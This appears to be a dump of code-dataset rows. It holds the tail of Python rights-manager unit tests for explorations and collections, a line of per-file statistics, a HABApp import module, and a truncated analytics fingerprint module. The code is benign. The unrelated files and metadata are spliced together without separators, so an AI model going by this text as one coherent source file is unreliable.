rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
def test_inviting_playtester_to_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
rights_manager.assign_role_for_exploration(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_VIEWER)
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
def test_setting_rights_of_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.assign_role_for_exploration(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_VIEWER)
with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
rights_manager.assign_role_for_exploration(
self.user_id_b, self.EXP_ID, self.user_id_c,
rights_manager.ROLE_VIEWER)
rights_manager.assign_role_for_exploration(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
rights_manager.assign_role_for_exploration(
self.user_id_b, self.EXP_ID, self.user_id_c,
rights_manager.ROLE_VIEWER)
rights_manager.assign_role_for_exploration(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_OWNER)
rights_manager.assign_role_for_exploration(
self.user_id_b, self.EXP_ID, self.user_id_c,
rights_manager.ROLE_OWNER)
rights_manager.assign_role_for_exploration(
self.user_id_b, self.EXP_ID, self.user_id_d,
rights_manager.ROLE_EDITOR)
rights_manager.assign_role_for_exploration(
self.user_id_b, self.EXP_ID, self.user_id_e,
rights_manager.ROLE_VIEWER)
def test_publishing_and_unpublishing_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_unpublish(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
def test_can_only_delete_unpublished_explorations(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
def test_can_publicize_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_publicize(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_publicize(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
def test_changing_viewability_of_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(rights_manager.Actor(
self.user_id_a).can_change_private_viewability(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(rights_manager.Actor(
self.user_id_b).can_change_private_viewability(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(rights_manager.Actor(
self.user_id_admin).can_change_private_viewability(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
with self.assertRaisesRegexp(Exception, 'already the current value'):
rights_manager.set_private_viewability_of_exploration(
self.user_id_a, self.EXP_ID, False)
with self.assertRaisesRegexp(Exception, 'cannot be changed'):
rights_manager.set_private_viewability_of_exploration(
self.user_id_b, self.EXP_ID, True)
rights_manager.set_private_viewability_of_exploration(
self.user_id_a, self.EXP_ID, True)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
rights_manager.set_private_viewability_of_exploration(
self.user_id_a, self.EXP_ID, False)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
self.assertFalse(rights_manager.Actor(
self.user_id_a).can_change_private_viewability(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)
self.assertTrue(rights_manager.Actor(
self.user_id_a).can_change_private_viewability(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(rights_manager.Actor(
self.user_id_b).can_change_private_viewability(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(rights_manager.Actor(
self.user_id_admin).can_change_private_viewability(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
class CollectionRightsTests(test_utils.GenericTestBase):
"""Test that rights for actions on collections work as expected."""
COLLECTION_ID = 'collection_id'
EXP_ID_FOR_COLLECTION = 'exp_id_for_collection'
def setUp(self):
super(CollectionRightsTests, self).setUp()
self.signup('a@example.com', 'A')
self.signup('b@example.com', 'B')
self.signup('c@example.com', 'C')
self.signup('d@example.com', 'D')
self.signup('e@example.com', 'E')
self.signup(self.ADMIN_EMAIL, username=self.ADMIN_USERNAME)
self.user_id_a = self.get_user_id_from_email('a@example.com')
self.user_id_b = self.get_user_id_from_email('b@example.com')
self.user_id_c = self.get_user_id_from_email('c@example.com')
self.user_id_d = self.get_user_id_from_email('d@example.com')
self.user_id_e = self.get_user_id_from_email('e@example.com')
self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
def test_get_collection_rights_for_nonexistent_collection(self):
non_col_id = 'this_collection_does_not_exist_id'
with self.assertRaisesRegexp(
Exception,
'Entity for class CollectionRightsModel with id '
'this_collection_does_not_exist_id not found'
):
rights_manager.get_collection_rights(non_col_id)
self.assertIsNone(
rights_manager.get_collection_rights(non_col_id, strict=False))
def test_demo_collection(self):
collection_services.load_demo('0')
rights_manager.release_ownership_of_collection(
feconf.SYSTEM_COMMITTER_ID, '0')
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
def test_ownership_of_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
self.assertTrue(
rights_manager.Actor(self.user_id_a).is_owner(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).is_owner(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).is_owner(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
def test_newly_created_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
def test_inviting_collaborator_to_collection(self):
self.save_new_valid_collection(
self.COLLECTION_ID, self.user_id_a,
exploration_id=self.EXP_ID_FOR_COLLECTION)
# Verify initial editor permissions for the collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
# Verify initial editor permissions for the exploration within the
# collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
# User A adds user B to the collection as an editor.
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
# Ensure User B is now an editor of the collection.
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
# Ensure User B is not an editor of the exploration within the
# collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
def test_inviting_playtester_to_collection(self):
self.save_new_valid_collection(
self.COLLECTION_ID, self.user_id_a,
exploration_id=self.EXP_ID_FOR_COLLECTION)
# Verify initial viewer permissions for the collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
# Verify initial viewer permissions for the exploration within the
# collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
# User A adds user B to the collection as a viewer.
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_VIEWER)
# Ensure User B is now a viewer of the collection.
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
# Ensure User B cannot view the exploration just because he/she has
# access to the collection containing it.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
def test_setting_rights_of_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_VIEWER)
with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_c,
rights_manager.ROLE_VIEWER)
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_c,
rights_manager.ROLE_VIEWER)
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_OWNER)
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_c,
rights_manager.ROLE_OWNER)
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_d,
rights_manager.ROLE_EDITOR)
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_e,
rights_manager.ROLE_VIEWER)
def test_publishing_and_unpublishing_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
rights_manager.publish_collection(self.user_id_a, self.COLLECTION_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_unpublish(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
rights_manager.unpublish_collection(
self.user_id_admin, self.COLLECTION_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
def test_can_only_delete_unpublished_collections(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
rights_manager.publish_collection(self.user_id_a, self.COLLECTION_ID)
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
rights_manager.unpublish_collection(
self.user_id_admin, self.COLLECTION_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
def test_can_publicize_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
rights_manager.publish_collection(self.user_id_a, self.COLLECTION_ID)
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_publicize(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_publicize(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
| 45.479755 | 78 | 0.678843 | 4,587 | 37,066 | 5.075431 | 0.044474 | 0.196555 | 0.099223 | 0.134187 | 0.935441 | 0.922684 | 0.917014 | 0.913062 | 0.90692 | 0.899231 | 0 | 0.001352 | 0.241569 | 37,066 | 814 | 79 | 45.535627 | 0.8268 | 0.040873 | 0 | 0.905263 | 0 | 0 | 0.024559 | 0.005126 | 0 | 0 | 0 | 0 | 0.228571 | 1 | 0.03609 | false | 0 | 0.009023 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
91bc6f50823e59ad9091eece449bee9a68d27fe5 | 241 | py | Python | src/HABApp/openhab/__init__.py | pailloM/HABApp | 3e0defd99ede9b91c164cb9d1ee011fd74e801c3 | [
"Apache-2.0"
] | null | null | null | src/HABApp/openhab/__init__.py | pailloM/HABApp | 3e0defd99ede9b91c164cb9d1ee011fd74e801c3 | [
"Apache-2.0"
] | null | null | null | src/HABApp/openhab/__init__.py | pailloM/HABApp | 3e0defd99ede9b91c164cb9d1ee011fd74e801c3 | [
"Apache-2.0"
] | null | null | null | # no external dependencies
import HABApp.openhab.errors
import HABApp.openhab.events
import HABApp.openhab.interface_async
import HABApp.openhab.interface
# items use the interface for the convenience functions
import HABApp.openhab.items
| 24.1 | 55 | 0.846473 | 32 | 241 | 6.34375 | 0.5 | 0.295567 | 0.46798 | 0.275862 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103734 | 241 | 9 | 56 | 26.777778 | 0.939815 | 0.323651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
91dfe9d6055df8af2dabc94ba3361e34395655d2 | 13,060 | py | Python | analytics_engine/data_analytics/fingerprint.py | svoorakk/analytics_engine | f5636be9682a8b56bdc1f55f80235b5bf4c155b7 | [
"Apache-2.0"
] | null | null | null | analytics_engine/data_analytics/fingerprint.py | svoorakk/analytics_engine | f5636be9682a8b56bdc1f55f80235b5bf4c155b7 | [
"Apache-2.0"
] | 9 | 2018-05-23T07:11:17.000Z | 2019-12-10T08:42:10.000Z | analytics_engine/data_analytics/fingerprint.py | svoorakk/analytics_engine | f5636be9682a8b56bdc1f55f80235b5bf4c155b7 | [
"Apache-2.0"
] | 5 | 2018-09-14T12:13:30.000Z | 2021-07-17T00:20:17.000Z | # Copyright (c) 2017, Intel Research and Development Ireland Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__authors__ = 'Giuliana Carullo, Vincenzo Riccobene'
__copyright__ = "Copyright (c) 2017, Intel Research and Development Ireland Ltd."
__license__ = "Apache 2.0"
__maintainer__ = "Giuliana Carullo"
__email__ = "giuliana.carullo@intel.com"
__status__ = "Development"
from analytics_engine.heuristics.beans.infograph import InfoGraphNode, InfoGraphNodeType, \
InfoGraphNodeCategory, InfoGraphNodeLayer
import pandas
import math
class Fingerprint(object):
# Deprecated
@staticmethod
def _node_is_nic_on_management_net(node, graph, mng_net_name):
node_name = InfoGraphNode.get_name(node)
node_type = InfoGraphNode.get_type(node)
if node_type == InfoGraphNodeType.VIRTUAL_NIC or \
node_type == InfoGraphNodeType.VIRTUAL_NIC_2:
neighs = graph.neighbors(node_name)
for n in neighs:
neighbor = InfoGraphNode.\
get_node(graph, n)
if InfoGraphNode.get_type(neighbor) == \
InfoGraphNodeType.VIRTUAL_NETWORK:
network_name = \
InfoGraphNode.get_attributes(
neighbor)['name']
if network_name == mng_net_name:
return True
return False
@staticmethod
def workload_capacity_usage(annotated_subgraph):
"""
This is a type of fingerprint
"""
# TODO: Validate graph
categories = list()
categories.append(InfoGraphNodeCategory.COMPUTE)
categories.append(InfoGraphNodeCategory.NETWORK)
# TODO: Add a Volume to the workloads to get HD usage
categories.append(InfoGraphNodeCategory.STORAGE)
# TODO: Get telemetry for Memory
categories.append(InfoGraphNodeCategory.MEMORY)
fingerprint = dict()
counter = dict()
for category in categories:
fingerprint[category] = 0
counter[category] = 0
# calculation of the fingerprint on top of the virtual resources
local_subgraph = annotated_subgraph.copy()
local_subgraph.filter_nodes('layer', "physical")
local_subgraph.filter_nodes('layer', "service")
for node in local_subgraph.nodes(data=True):
# if Fingerprint._node_is_nic_on_management_net(
# node, annotated_subgraph, mng_net_name):
# continue
category = InfoGraphNode.get_category(node)
utilization = InfoGraphNode.get_utilization(node)
if 'utilization' in utilization.columns.values:
mean = utilization['utilization'].mean()
fingerprint[category] += mean
counter[category] += 1
# This is just an average
# TODO: Improve the average
for category in categories:
if counter[category] > 0:
fingerprint[category] = \
fingerprint[category] / counter[category]
return fingerprint
@staticmethod
def machine_capacity_usage(annotated_subgraph):
"""
This is a type of fingerprint from the infrastructure perspective
"""
# TODO: Validate graph
categories = list()
categories.append(InfoGraphNodeCategory.COMPUTE)
categories.append(InfoGraphNodeCategory.NETWORK)
# TODO: Add a Volume to the workloads to get HD usage
categories.append(InfoGraphNodeCategory.STORAGE)
# TODO: Get telemetry for Memory
categories.append(InfoGraphNodeCategory.MEMORY)
fingerprint = dict()
counter = dict()
for category in categories:
fingerprint[category] = 0
counter[category] = 0
# calculation of the fingerprint on top of the virtual resources
local_subgraph = annotated_subgraph.copy()
local_subgraph.filter_nodes('layer', "virtual")
local_subgraph.filter_nodes('layer', "service")
local_subgraph.filter_nodes('type', 'machine')
for node in local_subgraph.nodes(data=True):
# if Fingerprint._node_is_nic_on_management_net(
# node, annotated_subgraph, mng_net_name):
# continue
name = InfoGraphNode.get_name(node)
category = InfoGraphNode.get_category(node)
utilization = InfoGraphNode.get_utilization(node)
if 'utilization' in utilization.columns.values:
# LOG.info("NODE: {} - CATEGORY: {}".format(name, category))
mean = utilization['utilization'].mean()
fingerprint[category] += mean
counter[category] += 1
# This is just an average
# TODO: Improve the average
for category in categories:
if counter[category] > 0:
fingerprint[category] = \
fingerprint[category] / counter[category]
return fingerprint
@staticmethod
def compute_node(annotated_subgraph, hostname=None):
"""
This is a type of fingerprint from the infrastructure perspective
"""
# TODO: Validate graph
data = dict()
statistics = dict()
compute = InfoGraphNodeCategory.COMPUTE
data[compute] = pandas.DataFrame()
